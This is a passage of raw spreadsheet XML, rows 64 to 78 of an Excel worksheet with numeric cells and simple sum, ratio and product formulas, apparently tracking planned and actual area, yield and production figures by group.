      <c r="R64" s="87"/>
      <c r="S64" s="12"/>
      <c r="T64" s="11"/>
      <c r="U64" s="12"/>
      <c r="V64" s="87"/>
      <c r="W64" s="12"/>
      <c r="X64" s="11"/>
      <c r="Y64" s="12"/>
      <c r="Z64" s="87"/>
      <c r="AA64" s="12"/>
      <c r="AB64" s="11"/>
      <c r="AC64" s="12"/>
      <c r="AD64" s="87"/>
      <c r="AE64" s="12"/>
      <c r="AF64" s="11"/>
      <c r="AG64" s="87"/>
      <c r="AH64" s="12"/>
      <c r="AI64" s="11"/>
      <c r="AJ64" s="87"/>
      <c r="AK64" s="12"/>
      <c r="AL64" s="11"/>
      <c r="AM64" s="87"/>
      <c r="AN64" s="87"/>
      <c r="AO64" s="87"/>
      <c r="AP64" s="74">
        <f>O64-M64</f>
        <v>0</v>
      </c>
      <c r="AQ64" s="91"/>
    </row>
    <row r="65" spans="1:43" ht="22.5" customHeight="1">
      <c r="A65" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B65" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C65" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D65" s="89">
        <v>106</v>
      </c>
      <c r="E65" s="83">
        <v>104.6</v>
      </c>
      <c r="F65" s="89">
        <v>9</v>
      </c>
      <c r="G65" s="89">
        <v>17</v>
      </c>
      <c r="H65" s="89">
        <v>10</v>
      </c>
      <c r="I65" s="89">
        <v>20</v>
      </c>
      <c r="J65" s="89">
        <v>19</v>
      </c>
      <c r="K65" s="89">
        <v>9</v>
      </c>
      <c r="L65" s="89">
        <v>8</v>
      </c>
      <c r="M65" s="85">
        <v>90</v>
      </c>
      <c r="N65" s="98">
        <f>P65+T65+X65+AB65+AF65+AI65+AL65</f>
        <v>92</v>
      </c>
      <c r="O65" s="86">
        <f>R65+V65+Z65+AD65+AG65+AJ65+AM65</f>
        <v>92</v>
      </c>
      <c r="P65" s="11">
        <v>9</v>
      </c>
      <c r="Q65" s="12">
        <v>9</v>
      </c>
      <c r="R65" s="87">
        <f>9</f>
        <v>9</v>
      </c>
      <c r="S65" s="33">
        <f>R65-Q65</f>
        <v>0</v>
      </c>
      <c r="T65" s="11">
        <v>17</v>
      </c>
      <c r="U65" s="12">
        <v>17</v>
      </c>
      <c r="V65" s="87">
        <f>17</f>
        <v>17</v>
      </c>
      <c r="W65" s="12"/>
      <c r="X65" s="11">
        <v>10</v>
      </c>
      <c r="Y65" s="12">
        <v>10</v>
      </c>
      <c r="Z65" s="87">
        <f>10</f>
        <v>10</v>
      </c>
      <c r="AA65" s="12"/>
      <c r="AB65" s="11">
        <v>20</v>
      </c>
      <c r="AC65" s="12"/>
      <c r="AD65" s="87">
        <f>20</f>
        <v>20</v>
      </c>
      <c r="AE65" s="12"/>
      <c r="AF65" s="11">
        <v>19</v>
      </c>
      <c r="AG65" s="87">
        <f>19</f>
        <v>19</v>
      </c>
      <c r="AH65" s="12"/>
      <c r="AI65" s="11">
        <v>9</v>
      </c>
      <c r="AJ65" s="87">
        <f>9</f>
        <v>9</v>
      </c>
      <c r="AK65" s="12"/>
      <c r="AL65" s="11">
        <v>8</v>
      </c>
      <c r="AM65" s="87">
        <v>8</v>
      </c>
      <c r="AN65" s="87"/>
      <c r="AO65" s="73">
        <f>O65/N65*100</f>
        <v>100</v>
      </c>
      <c r="AP65" s="74">
        <f>O65-M65</f>
        <v>2</v>
      </c>
      <c r="AQ65" s="91"/>
    </row>
    <row r="66" spans="1:43" ht="22.5" customHeight="1">
      <c r="A66" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B66" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C66" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D66" s="89">
        <v>15</v>
      </c>
      <c r="E66" s="83">
        <v>14.938814531548761</v>
      </c>
      <c r="F66" s="89">
        <v>12</v>
      </c>
      <c r="G66" s="89">
        <v>18</v>
      </c>
      <c r="H66" s="89">
        <v>13</v>
      </c>
      <c r="I66" s="89">
        <v>15</v>
      </c>
      <c r="J66" s="89">
        <v>17</v>
      </c>
      <c r="K66" s="89">
        <v>18</v>
      </c>
      <c r="L66" s="89">
        <v>12</v>
      </c>
      <c r="M66" s="90">
        <f>M67/M65*10</f>
        <v>15.366666666666669</v>
      </c>
      <c r="N66" s="98">
        <f>N67/N65*100</f>
        <v>11.739130434782609</v>
      </c>
      <c r="O66" s="86">
        <f>O67/O65*10</f>
        <v>0</v>
      </c>
      <c r="P66" s="11">
        <v>12</v>
      </c>
      <c r="Q66" s="12">
        <v>12</v>
      </c>
      <c r="R66" s="87"/>
      <c r="S66" s="12"/>
      <c r="T66" s="11"/>
      <c r="U66" s="12"/>
      <c r="V66" s="87"/>
      <c r="W66" s="12"/>
      <c r="X66" s="11"/>
      <c r="Y66" s="12"/>
      <c r="Z66" s="87"/>
      <c r="AA66" s="12"/>
      <c r="AB66" s="11"/>
      <c r="AC66" s="12"/>
      <c r="AD66" s="87"/>
      <c r="AE66" s="12"/>
      <c r="AF66" s="11"/>
      <c r="AG66" s="87"/>
      <c r="AH66" s="12"/>
      <c r="AI66" s="11"/>
      <c r="AJ66" s="87"/>
      <c r="AK66" s="12"/>
      <c r="AL66" s="11"/>
      <c r="AM66" s="87"/>
      <c r="AN66" s="87"/>
      <c r="AO66" s="87"/>
      <c r="AP66" s="74"/>
      <c r="AQ66" s="91"/>
    </row>
    <row r="67" spans="1:43" ht="22.5" customHeight="1">
      <c r="A67" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B67" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C67" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D67" s="89">
        <v>157</v>
      </c>
      <c r="E67" s="83">
        <v>156.26000000000002</v>
      </c>
      <c r="F67" s="89">
        <f t="shared" ref="F67:L67" si="163">F66*F65/10</f>
        <v>10.8</v>
      </c>
      <c r="G67" s="89">
        <f t="shared" si="163"/>
        <v>30.6</v>
      </c>
      <c r="H67" s="89">
        <f t="shared" si="163"/>
        <v>13</v>
      </c>
      <c r="I67" s="89">
        <f t="shared" si="163"/>
        <v>30</v>
      </c>
      <c r="J67" s="89">
        <f t="shared" si="163"/>
        <v>32.299999999999997</v>
      </c>
      <c r="K67" s="89">
        <f t="shared" si="163"/>
        <v>16.2</v>
      </c>
      <c r="L67" s="89">
        <f t="shared" si="163"/>
        <v>9.6</v>
      </c>
      <c r="M67" s="85">
        <v>138.30000000000001</v>
      </c>
      <c r="N67" s="98">
        <f>P67+T67+X67+AB67+AF67+AI67+AL67</f>
        <v>10.8</v>
      </c>
      <c r="O67" s="86">
        <f>R67+V67+Z67+AD67+AG67+AJ67+AM67</f>
        <v>0</v>
      </c>
      <c r="P67" s="11">
        <f t="shared" ref="P67" si="164">P66*P65/10</f>
        <v>10.8</v>
      </c>
      <c r="Q67" s="12">
        <v>10.8</v>
      </c>
      <c r="R67" s="87"/>
      <c r="S67" s="12"/>
      <c r="T67" s="11"/>
      <c r="U67" s="12"/>
      <c r="V67" s="87"/>
      <c r="W67" s="12"/>
      <c r="X67" s="11"/>
      <c r="Y67" s="12"/>
      <c r="Z67" s="87"/>
      <c r="AA67" s="12"/>
      <c r="AB67" s="11"/>
      <c r="AC67" s="12"/>
      <c r="AD67" s="87"/>
      <c r="AE67" s="12"/>
      <c r="AF67" s="11"/>
      <c r="AG67" s="87"/>
      <c r="AH67" s="12"/>
      <c r="AI67" s="11"/>
      <c r="AJ67" s="87"/>
      <c r="AK67" s="12"/>
      <c r="AL67" s="11"/>
      <c r="AM67" s="87"/>
      <c r="AN67" s="87"/>
      <c r="AO67" s="87"/>
      <c r="AP67" s="74"/>
      <c r="AQ67" s="91"/>
    </row>
    <row r="68" spans="1:43" ht="22.5" customHeight="1">
      <c r="A68" s="76">
        <v>5</v>
      </c>
      <c r="B68" s="24" t="s">
        <v>72</v>
      </c>
      <c r="C68" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D68" s="70">
        <v>56</v>
      </c>
      <c r="E68" s="71">
        <f>E70+E75</f>
        <v>56.45</v>
      </c>
      <c r="F68" s="70">
        <f t="shared" ref="F68:L68" si="165">F70+F75</f>
        <v>0</v>
      </c>
      <c r="G68" s="70">
        <f t="shared" si="165"/>
        <v>44.15</v>
      </c>
      <c r="H68" s="70">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="I68" s="70">
        <f t="shared" si="165"/>
        <v>31.6</v>
      </c>
      <c r="J68" s="70">
        <f t="shared" si="165"/>
        <v>12.18</v>
      </c>
      <c r="K68" s="70">
        <f t="shared" si="165"/>
        <v>9.9</v>
      </c>
      <c r="L68" s="70">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="M68" s="77">
        <f>M70+M75</f>
        <v>75.73</v>
      </c>
      <c r="N68" s="191">
        <f>N70+N75</f>
        <v>219.3</v>
      </c>
      <c r="O68" s="73">
        <f>O70+O75</f>
        <v>146.54000000000002</v>
      </c>
      <c r="P68" s="32">
        <f t="shared" ref="P68" si="166">P70+P75</f>
        <v>0</v>
      </c>
      <c r="Q68" s="33">
        <v>0</v>
      </c>
      <c r="R68" s="79">
        <f t="shared" ref="R68:T68" si="167">R70+R75</f>
        <v>0</v>
      </c>
      <c r="S68" s="35"/>
      <c r="T68" s="32">
        <f t="shared" si="167"/>
        <v>55</v>
      </c>
      <c r="U68" s="33">
        <v>44.15</v>
      </c>
      <c r="V68" s="79">
        <f t="shared" ref="V68:X68" si="168">V70+V75</f>
        <v>55.25</v>
      </c>
      <c r="W68" s="35"/>
      <c r="X68" s="32">
        <f t="shared" si="168"/>
        <v>30</v>
      </c>
      <c r="Y68" s="33">
        <v>0</v>
      </c>
      <c r="Z68" s="79">
        <f t="shared" ref="Z68:AB68" si="169">Z70+Z75</f>
        <v>1.6</v>
      </c>
      <c r="AA68" s="35"/>
      <c r="AB68" s="32">
        <f t="shared" si="169"/>
        <v>57</v>
      </c>
      <c r="AC68" s="33"/>
      <c r="AD68" s="79">
        <f t="shared" ref="AD68:AF68" si="170">AD70+AD75</f>
        <v>51.24</v>
      </c>
      <c r="AE68" s="35"/>
      <c r="AF68" s="32">
        <f t="shared" si="170"/>
        <v>26</v>
      </c>
      <c r="AG68" s="79">
        <f t="shared" ref="AG68:AI68" si="171">AG70+AG75</f>
        <v>22.05</v>
      </c>
      <c r="AH68" s="35"/>
      <c r="AI68" s="32">
        <f t="shared" si="171"/>
        <v>51.3</v>
      </c>
      <c r="AJ68" s="79">
        <f t="shared" ref="AJ68:AL68" si="172">AJ70+AJ75</f>
        <v>16.399999999999999</v>
      </c>
      <c r="AK68" s="35"/>
      <c r="AL68" s="32">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="AM68" s="79">
        <f t="shared" ref="AM68" si="173">AM70+AM75</f>
        <v>0</v>
      </c>
      <c r="AN68" s="79"/>
      <c r="AO68" s="73">
        <f>O68/N68*100</f>
        <v>66.821705426356587</v>
      </c>
      <c r="AP68" s="74">
        <f>O68-M68</f>
        <v>70.810000000000016</v>
      </c>
      <c r="AQ68" s="80"/>
    </row>
    <row r="69" spans="1:43" ht="22.5" customHeight="1">
      <c r="A69" s="92" t="s">
        <v>94</v>
      </c>
      <c r="B69" s="93" t="s">
        <v>20</v>
      </c>
      <c r="C69" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D69" s="89"/>
      <c r="E69" s="71"/>
      <c r="F69" s="89"/>
      <c r="G69" s="89"/>
      <c r="H69" s="89"/>
      <c r="I69" s="89"/>
      <c r="J69" s="89"/>
      <c r="K69" s="89"/>
      <c r="L69" s="89"/>
      <c r="M69" s="85">
        <v>246.64999999999998</v>
      </c>
      <c r="N69" s="98"/>
      <c r="O69" s="86"/>
      <c r="P69" s="11"/>
      <c r="Q69" s="12"/>
      <c r="R69" s="87"/>
      <c r="S69" s="12"/>
      <c r="T69" s="11"/>
      <c r="U69" s="12"/>
      <c r="V69" s="87"/>
      <c r="W69" s="12"/>
      <c r="X69" s="11"/>
      <c r="Y69" s="12"/>
      <c r="Z69" s="87"/>
      <c r="AA69" s="12"/>
      <c r="AB69" s="11"/>
      <c r="AC69" s="12"/>
      <c r="AD69" s="87"/>
      <c r="AE69" s="12"/>
      <c r="AF69" s="11"/>
      <c r="AG69" s="87"/>
      <c r="AH69" s="12"/>
      <c r="AI69" s="11"/>
      <c r="AJ69" s="87"/>
      <c r="AK69" s="12"/>
      <c r="AL69" s="11"/>
      <c r="AM69" s="87"/>
      <c r="AN69" s="87"/>
      <c r="AO69" s="87"/>
      <c r="AP69" s="74">
        <f>O69-M69</f>
        <v>-246.64999999999998</v>
      </c>
      <c r="AQ69" s="91"/>
    </row>
    <row r="70" spans="1:43" ht="22.5" customHeight="1">
      <c r="A70" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B70" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C70" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D70" s="89">
        <v>39</v>
      </c>
      <c r="E70" s="83">
        <v>39.15</v>
      </c>
      <c r="F70" s="89">
        <v>0</v>
      </c>
      <c r="G70" s="91">
        <v>39.15</v>
      </c>
      <c r="H70" s="91">
        <v>0</v>
      </c>
      <c r="I70" s="91">
        <v>29.6</v>
      </c>
      <c r="J70" s="91">
        <v>6.18</v>
      </c>
      <c r="K70" s="91">
        <v>8.6</v>
      </c>
      <c r="L70" s="89">
        <v>0</v>
      </c>
      <c r="M70" s="85">
        <v>66.73</v>
      </c>
      <c r="N70" s="98">
        <f>P70+T70+X70+AB70+AF70+AI70+AL70</f>
        <v>205</v>
      </c>
      <c r="O70" s="86">
        <f>R70+V70+Z70+AD70+AG70+AJ70+AM70</f>
        <v>132.24</v>
      </c>
      <c r="P70" s="11">
        <v>0</v>
      </c>
      <c r="Q70" s="12">
        <v>0</v>
      </c>
      <c r="R70" s="87">
        <v>0</v>
      </c>
      <c r="S70" s="33">
        <f>R70-Q70</f>
        <v>0</v>
      </c>
      <c r="T70" s="11">
        <v>50</v>
      </c>
      <c r="U70" s="12">
        <v>39.15</v>
      </c>
      <c r="V70" s="87">
        <v>50.25</v>
      </c>
      <c r="W70" s="12"/>
      <c r="X70" s="11">
        <v>30</v>
      </c>
      <c r="Y70" s="12">
        <v>0</v>
      </c>
      <c r="Z70" s="87">
        <v>1.6</v>
      </c>
      <c r="AA70" s="12"/>
      <c r="AB70" s="11">
        <v>55</v>
      </c>
      <c r="AC70" s="12"/>
      <c r="AD70" s="87">
        <v>49.24</v>
      </c>
      <c r="AE70" s="12"/>
      <c r="AF70" s="11">
        <f>15+5</f>
        <v>20</v>
      </c>
      <c r="AG70" s="87">
        <v>16.05</v>
      </c>
      <c r="AH70" s="12">
        <f>AG70-J70</f>
        <v>9.870000000000001</v>
      </c>
      <c r="AI70" s="11">
        <f>37+13</f>
        <v>50</v>
      </c>
      <c r="AJ70" s="87">
        <v>15.1</v>
      </c>
      <c r="AK70" s="12"/>
      <c r="AL70" s="11">
        <v>0</v>
      </c>
      <c r="AM70" s="87">
        <v>0</v>
      </c>
      <c r="AN70" s="87"/>
      <c r="AO70" s="73">
        <f>O70/N70*100</f>
        <v>64.507317073170739</v>
      </c>
      <c r="AP70" s="74">
        <f>O70-M70</f>
        <v>65.510000000000005</v>
      </c>
      <c r="AQ70" s="91"/>
    </row>
    <row r="71" spans="1:43" ht="22.5" customHeight="1">
      <c r="A71" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B71" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C71" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D71" s="89">
        <v>0</v>
      </c>
      <c r="E71" s="83">
        <v>581</v>
      </c>
      <c r="F71" s="89">
        <v>0</v>
      </c>
      <c r="G71" s="89">
        <v>0</v>
      </c>
      <c r="H71" s="89">
        <v>0</v>
      </c>
      <c r="I71" s="89">
        <v>0</v>
      </c>
      <c r="J71" s="89">
        <v>0</v>
      </c>
      <c r="K71" s="89">
        <v>0</v>
      </c>
      <c r="L71" s="89">
        <v>0</v>
      </c>
      <c r="M71" s="85"/>
      <c r="N71" s="98">
        <f>N72/N70*10</f>
        <v>0</v>
      </c>
      <c r="O71" s="86">
        <f>O72/O70*10</f>
        <v>0</v>
      </c>
      <c r="P71" s="40">
        <v>0</v>
      </c>
      <c r="Q71" s="41">
        <v>0</v>
      </c>
      <c r="R71" s="87"/>
      <c r="S71" s="87"/>
      <c r="T71" s="42"/>
      <c r="U71" s="42"/>
      <c r="V71" s="87"/>
      <c r="W71" s="87"/>
      <c r="X71" s="42"/>
      <c r="Y71" s="42"/>
      <c r="Z71" s="87"/>
      <c r="AA71" s="87"/>
      <c r="AB71" s="42"/>
      <c r="AC71" s="42"/>
      <c r="AD71" s="87"/>
      <c r="AE71" s="87"/>
      <c r="AF71" s="42"/>
      <c r="AG71" s="87"/>
      <c r="AH71" s="87"/>
      <c r="AI71" s="42"/>
      <c r="AJ71" s="87"/>
      <c r="AK71" s="87"/>
      <c r="AL71" s="42"/>
      <c r="AM71" s="87"/>
      <c r="AN71" s="87"/>
      <c r="AO71" s="87"/>
      <c r="AP71" s="74"/>
      <c r="AQ71" s="91"/>
    </row>
    <row r="72" spans="1:43" ht="22.5" customHeight="1">
      <c r="A72" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B72" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C72" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D72" s="89">
        <v>0</v>
      </c>
      <c r="E72" s="83">
        <v>2274.6149999999998</v>
      </c>
      <c r="F72" s="89">
        <f t="shared" ref="F72:L72" si="174">F71*F70/10</f>
        <v>0</v>
      </c>
      <c r="G72" s="89">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="H72" s="89">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="I72" s="89">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="J72" s="89">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="K72" s="89">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="L72" s="89">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="M72" s="85"/>
      <c r="N72" s="98">
        <f>P72+T72+X72+AB72+AF72+AI72+AL72</f>
        <v>0</v>
      </c>
      <c r="O72" s="86">
        <f>R72+V72+Z72+AD72+AG72+AJ72+AM72</f>
        <v>0</v>
      </c>
      <c r="P72" s="11">
        <f>P70*P71/10</f>
        <v>0</v>
      </c>
      <c r="Q72" s="12">
        <v>0</v>
      </c>
      <c r="R72" s="87"/>
      <c r="S72" s="12"/>
      <c r="T72" s="11"/>
      <c r="U72" s="12"/>
      <c r="V72" s="87"/>
      <c r="W72" s="12"/>
      <c r="X72" s="11"/>
      <c r="Y72" s="12"/>
      <c r="Z72" s="87"/>
      <c r="AA72" s="12"/>
      <c r="AB72" s="11"/>
      <c r="AC72" s="12"/>
      <c r="AD72" s="87"/>
      <c r="AE72" s="12"/>
      <c r="AF72" s="11"/>
      <c r="AG72" s="87"/>
      <c r="AH72" s="12"/>
      <c r="AI72" s="11"/>
      <c r="AJ72" s="87"/>
      <c r="AK72" s="12"/>
      <c r="AL72" s="11"/>
      <c r="AM72" s="87"/>
      <c r="AN72" s="87"/>
      <c r="AO72" s="87"/>
      <c r="AP72" s="74"/>
      <c r="AQ72" s="91"/>
    </row>
    <row r="73" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A73" s="68"/>
      <c r="B73" s="101" t="s">
        <v>71</v>
      </c>
      <c r="C73" s="25"/>
      <c r="D73" s="89">
        <v>0</v>
      </c>
      <c r="E73" s="71"/>
      <c r="F73" s="89">
        <f>F70</f>
        <v>0</v>
      </c>
      <c r="G73" s="89">
        <v>11</v>
      </c>
      <c r="H73" s="89">
        <v>5</v>
      </c>
      <c r="I73" s="89">
        <v>55</v>
      </c>
      <c r="J73" s="89">
        <v>20</v>
      </c>
      <c r="K73" s="89">
        <v>20</v>
      </c>
      <c r="L73" s="89">
        <f>L70</f>
        <v>0</v>
      </c>
      <c r="M73" s="85">
        <v>138.30000000000001</v>
      </c>
      <c r="N73" s="98"/>
      <c r="O73" s="86"/>
      <c r="P73" s="38">
        <v>0</v>
      </c>
      <c r="Q73" s="39">
        <v>0</v>
      </c>
      <c r="R73" s="87"/>
      <c r="S73" s="12"/>
      <c r="T73" s="38"/>
      <c r="U73" s="39">
        <v>11</v>
      </c>
      <c r="V73" s="87"/>
      <c r="W73" s="12"/>
      <c r="X73" s="38"/>
      <c r="Y73" s="39">
        <v>5</v>
      </c>
      <c r="Z73" s="87"/>
      <c r="AA73" s="12"/>
      <c r="AB73" s="38"/>
      <c r="AC73" s="39"/>
      <c r="AD73" s="87"/>
      <c r="AE73" s="12"/>
      <c r="AF73" s="38"/>
      <c r="AG73" s="87"/>
      <c r="AH73" s="12"/>
      <c r="AI73" s="38"/>
      <c r="AJ73" s="87"/>
      <c r="AK73" s="12"/>
      <c r="AL73" s="38">
        <v>0</v>
      </c>
      <c r="AM73" s="87">
        <f>AM70</f>
        <v>0</v>
      </c>
      <c r="AN73" s="87"/>
      <c r="AO73" s="87"/>
      <c r="AP73" s="74">
        <f>O73-M73</f>
        <v>-138.30000000000001</v>
      </c>
      <c r="AQ73" s="91"/>
    </row>
    <row r="74" spans="1:43" ht="22.5" customHeight="1">
      <c r="A74" s="92" t="s">
        <v>95</v>
      </c>
      <c r="B74" s="93" t="s">
        <v>14</v>
      </c>
      <c r="C74" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D74" s="89"/>
      <c r="E74" s="71"/>
      <c r="F74" s="89"/>
      <c r="G74" s="89"/>
      <c r="H74" s="89"/>
      <c r="I74" s="89"/>
      <c r="J74" s="89"/>
      <c r="K74" s="89"/>
      <c r="L74" s="89"/>
      <c r="M74" s="85"/>
      <c r="N74" s="98"/>
      <c r="O74" s="73"/>
      <c r="P74" s="11"/>
      <c r="Q74" s="12"/>
      <c r="R74" s="87"/>
      <c r="S74" s="12"/>
      <c r="T74" s="11"/>
      <c r="U74" s="12"/>
      <c r="V74" s="87"/>
      <c r="W74" s="12"/>
      <c r="X74" s="11"/>
      <c r="Y74" s="12"/>
      <c r="Z74" s="87"/>
      <c r="AA74" s="12"/>
      <c r="AB74" s="11"/>
      <c r="AC74" s="12"/>
      <c r="AD74" s="87"/>
      <c r="AE74" s="12"/>
      <c r="AF74" s="11"/>
      <c r="AG74" s="87"/>
      <c r="AH74" s="12"/>
      <c r="AI74" s="11"/>
      <c r="AJ74" s="87"/>
      <c r="AK74" s="12"/>
      <c r="AL74" s="11"/>
      <c r="AM74" s="87"/>
      <c r="AN74" s="87"/>
      <c r="AO74" s="87"/>
      <c r="AP74" s="74"/>
      <c r="AQ74" s="91"/>
    </row>
    <row r="75" spans="1:43" ht="22.5" customHeight="1">
      <c r="A75" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B75" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C75" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D75" s="89">
        <v>17</v>
      </c>
      <c r="E75" s="83">
        <v>17.3</v>
      </c>
      <c r="F75" s="89">
        <v>0</v>
      </c>
      <c r="G75" s="89">
        <v>5</v>
      </c>
      <c r="H75" s="89">
        <v>0</v>
      </c>
      <c r="I75" s="89">
        <v>2</v>
      </c>
      <c r="J75" s="89">
        <v>6</v>
      </c>
      <c r="K75" s="89">
        <v>1.3</v>
      </c>
      <c r="L75" s="89">
        <v>0</v>
      </c>
      <c r="M75" s="85">
        <v>9</v>
      </c>
      <c r="N75" s="98">
        <f>P75+T75+X75+AB75+AF75+AI75+AL75</f>
        <v>14.3</v>
      </c>
      <c r="O75" s="86">
        <f>R75+V75+Z75+AD75+AG75+AJ75+AM75</f>
        <v>14.3</v>
      </c>
      <c r="P75" s="11">
        <v>0</v>
      </c>
      <c r="Q75" s="12">
        <v>0</v>
      </c>
      <c r="R75" s="87">
        <v>0</v>
      </c>
      <c r="S75" s="33">
        <f>R75-Q75</f>
        <v>0</v>
      </c>
      <c r="T75" s="11">
        <v>5</v>
      </c>
      <c r="U75" s="12">
        <v>5</v>
      </c>
      <c r="V75" s="87">
        <f>5</f>
        <v>5</v>
      </c>
      <c r="W75" s="12"/>
      <c r="X75" s="11">
        <v>0</v>
      </c>
      <c r="Y75" s="12">
        <v>0</v>
      </c>
      <c r="Z75" s="87">
        <v>0</v>
      </c>
      <c r="AA75" s="12"/>
      <c r="AB75" s="11">
        <v>2</v>
      </c>
      <c r="AC75" s="12"/>
      <c r="AD75" s="87">
        <f>2</f>
        <v>2</v>
      </c>
      <c r="AE75" s="12"/>
      <c r="AF75" s="11">
        <v>6</v>
      </c>
      <c r="AG75" s="87">
        <v>6</v>
      </c>
      <c r="AH75" s="12"/>
      <c r="AI75" s="11">
        <v>1.3</v>
      </c>
      <c r="AJ75" s="87">
        <v>1.3</v>
      </c>
      <c r="AK75" s="12"/>
      <c r="AL75" s="11">
        <v>0</v>
      </c>
      <c r="AM75" s="87">
        <v>0</v>
      </c>
      <c r="AN75" s="87"/>
      <c r="AO75" s="73">
        <f>O75/N75*100</f>
        <v>100</v>
      </c>
      <c r="AP75" s="74">
        <f>O75-M75</f>
        <v>5.3000000000000007</v>
      </c>
      <c r="AQ75" s="91"/>
    </row>
    <row r="76" spans="1:43" ht="22.5" customHeight="1">
      <c r="A76" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B76" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C76" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D76" s="89">
        <v>13</v>
      </c>
      <c r="E76" s="83">
        <v>13.204624277456647</v>
      </c>
      <c r="F76" s="89">
        <v>0</v>
      </c>
      <c r="G76" s="89">
        <v>14</v>
      </c>
      <c r="H76" s="89">
        <v>0</v>
      </c>
      <c r="I76" s="89">
        <v>13</v>
      </c>
      <c r="J76" s="89">
        <v>13</v>
      </c>
      <c r="K76" s="89">
        <v>14</v>
      </c>
      <c r="L76" s="89"/>
      <c r="M76" s="85"/>
      <c r="N76" s="98">
        <f>N77/N75*10</f>
        <v>0</v>
      </c>
      <c r="O76" s="87">
        <f>O77/O75*10</f>
        <v>0</v>
      </c>
      <c r="P76" s="11">
        <v>0</v>
      </c>
      <c r="Q76" s="12">
        <v>0</v>
      </c>
      <c r="R76" s="87"/>
      <c r="S76" s="12"/>
      <c r="T76" s="11"/>
      <c r="U76" s="12"/>
      <c r="V76" s="87"/>
      <c r="W76" s="12"/>
      <c r="X76" s="11"/>
      <c r="Y76" s="12"/>
      <c r="Z76" s="87"/>
      <c r="AA76" s="12"/>
      <c r="AB76" s="11"/>
      <c r="AC76" s="12"/>
      <c r="AD76" s="87"/>
      <c r="AE76" s="12"/>
      <c r="AF76" s="11"/>
      <c r="AG76" s="87"/>
      <c r="AH76" s="12"/>
      <c r="AI76" s="11"/>
      <c r="AJ76" s="87"/>
      <c r="AK76" s="12"/>
      <c r="AL76" s="11">
        <v>0</v>
      </c>
      <c r="AM76" s="87"/>
      <c r="AN76" s="87"/>
      <c r="AO76" s="87"/>
      <c r="AP76" s="74"/>
      <c r="AQ76" s="91"/>
    </row>
    <row r="77" spans="1:43" ht="22.5" customHeight="1">
      <c r="A77" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B77" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C77" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D77" s="89">
        <v>23</v>
      </c>
      <c r="E77" s="83">
        <v>22.844000000000001</v>
      </c>
      <c r="F77" s="89">
        <f>F76*F75/10</f>
        <v>0</v>
      </c>
      <c r="G77" s="89">
        <f>G76*G75/10</f>
        <v>7</v>
      </c>
      <c r="H77" s="89">
        <f>H76*H75/10</f>
        <v>0</v>
      </c>
      <c r="I77" s="89">
        <f t="shared" ref="I77:K77" si="175">I76*I75/10</f>
        <v>2.6</v>
      </c>
      <c r="J77" s="89">
        <f t="shared" si="175"/>
        <v>7.8</v>
      </c>
      <c r="K77" s="89">
        <f t="shared" si="175"/>
        <v>1.8199999999999998</v>
      </c>
      <c r="L77" s="89"/>
      <c r="M77" s="85">
        <v>0</v>
      </c>
      <c r="N77" s="98">
        <f>P77+T77+X77+AB77+AF77+AI77+AL77</f>
        <v>0</v>
      </c>
      <c r="O77" s="86">
        <f>R77+V77+Z77+AD77+AG77+AJ77+AM77</f>
        <v>0</v>
      </c>
      <c r="P77" s="11">
        <f>P75*P76/10</f>
        <v>0</v>
      </c>
      <c r="Q77" s="12">
        <v>0</v>
      </c>
      <c r="R77" s="87"/>
      <c r="S77" s="12"/>
      <c r="T77" s="11"/>
      <c r="U77" s="12"/>
      <c r="V77" s="87"/>
      <c r="W77" s="12"/>
      <c r="X77" s="11"/>
      <c r="Y77" s="12"/>
      <c r="Z77" s="87"/>
      <c r="AA77" s="12"/>
      <c r="AB77" s="11"/>
      <c r="AC77" s="12"/>
      <c r="AD77" s="87"/>
      <c r="AE77" s="12"/>
      <c r="AF77" s="11"/>
      <c r="AG77" s="87"/>
      <c r="AH77" s="12"/>
      <c r="AI77" s="11"/>
      <c r="AJ77" s="87"/>
      <c r="AK77" s="12"/>
      <c r="AL77" s="11">
        <f t="shared" ref="AL77" si="176">AL75*AL76/10</f>
        <v>0</v>
      </c>
      <c r="AM77" s="87"/>
      <c r="AN77" s="87"/>
      <c r="AO77" s="87"/>
      <c r="AP77" s="74"/>
      <c r="AQ77" s="91"/>
    </row>
    <row r="78" spans="1:43" ht="22.5" customHeight="1">
      <c r="A78" s="76" t="s">
        <v>30</v>
      </c>
      <c r="B78" s="24" t="s">
        <v>121</v>
      </c>
      <c r="C78" s="69" t="s">
        <v>1</v>
      </c>
